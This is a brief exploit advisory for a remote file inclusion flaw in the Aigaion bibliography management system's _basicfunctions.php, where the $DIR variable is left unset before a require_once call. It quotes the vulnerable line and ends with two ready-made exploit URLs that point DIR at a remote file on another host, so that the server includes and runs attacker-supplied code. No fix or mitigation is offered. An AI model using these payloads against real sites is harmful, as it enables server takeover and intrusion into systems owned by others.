Software:Web based bibliography management system Download link: http://sourceforge.net/projects/aigaion/ script:_basicfunctions.php author: navairum
The script _basicfunctions.php does not specify a value for the $DIR variable before including it. Vulnerable code:
//if this script is not called from within one of the base pages, redirect to frontpage require_once($DIR."checkBase.php");
/ This function leads the browser to the given location /
Exploit: http://site/[PATH]/_basicfunctions.php?DIR=http://site/uhoh.txt? http://site/path/pageactionauthor.php?DIR=http://site/uhoh.txt?